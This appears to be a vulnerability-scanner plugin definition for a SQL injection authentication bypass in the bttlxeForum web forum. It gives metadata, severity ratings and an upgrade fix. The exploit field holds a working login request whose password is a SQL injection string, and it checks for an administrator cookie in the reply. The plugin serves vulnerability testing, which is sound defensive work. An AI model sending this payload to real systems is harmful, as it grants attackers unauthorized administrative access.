<plugin_id>16</plugin_id>
<plugin_name>bttlxeForum SQL injection</plugin_name>
<plugin_family>HTTP</plugin_family>
<plugin_created_date>2003/11/13</plugin_created_date>
<plugin_created_name>Marc Ruef</plugin_created_name>
<plugin_created_email>marc dot ruef at computec dot ch</plugin_created_email>
<plugin_created_web>http://www.computec.ch</plugin_created_web>
<plugin_created_company>computec.ch</plugin_created_company>
<plugin_updated_name>Marc Ruef</plugin_updated_name>
<plugin_updated_email>marc dot ruef at computec dot ch</plugin_updated_email>
<plugin_updated_web>http://www.computec.ch</plugin_updated_web>
<plugin_updated_company>computec.ch</plugin_updated_company>
<plugin_updated_date>2004/11/13</plugin_updated_date>
<plugin_version>2.0</plugin_version>
<plugin_changelog>Corrected an empty command in the request field in version 1.3. Corrected the plugin structure and added the accuracy values in 1.4. Improved the pattern matching and added the changelog in 2.0</plugin_changelog>
<plugin_protocol>tcp</plugin_protocol>
<plugin_port>80</plugin_port>
<plugin_procedure_exploit>open|send GET /forum/myaccount/login.asp HTTP/1.0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 87\nuserid=administrator&password=+%27or%27%27%3D%27+&cookielogin=cookielogin&Submit=Log+InN\n\n|sleep|close|pattern_exists HTTP/#.# ### *Set-Cookie: ForumMemberLevel=Administrator*</plugin_procedure_exploit>
<plugin_exploit_accuracy>99</plugin_exploit_accuracy>
<plugin_comment>This plugin was written with the ATK Attack Editor.</plugin_comment>
<bug_affected>bttlxeForum</bug_affected>
<bug_not_affected>Other forums and the latest version of bttlxeForum</bug_not_affected>
<bug_vulnerability_class>SQL Injection</bug_vulnerability_class>
<bug_description>bttlexeForum is a set of CGIs designed to run a forum-based web server on a Windows platform. There is an SQL injection bug an user can supply the password. An attacker may gain privileged access.</bug_description>
<bug_solution>Upgrade to the latest version of bttlexeForum. See http://www.battleaxesoftware.com/forums/forum.asp?forumid=36&select=1812 . Or use another forum software.</bug_solution>
<bug_fixing_time>30 minutes</bug_fixing_time>
<bug_exploit_availability>Yes</bug_exploit_availability>
<bug_remote>Yes</bug_remote>
<bug_local>Yes</bug_local>
<bug_severity>High</bug_severity>
<bug_popularity>7</bug_popularity>
<bug_simplicity>7</bug_simplicity>
<bug_impact>8</bug_impact>
<bug_risk>7</bug_risk>
<bug_nessus_risk>High</bug_nessus_risk>
<bug_check_tool>Nessus is able to do the same check.</bug_check_tool>
<source_cve>CAN-2003-0215</source_cve>
<source_nessus_id>11548</source_nessus_id>
<source_literature>Hacking Exposed: Network Security Secrets & Solutions, Stuart McClure, Joel Scambray and George Kurtz, February 25, 2003, 4th Edition, McGraw-Hill Osborne Media, ISBN 0072227427</source_literature>
<source_misc>http://www.computec.ch</source_misc>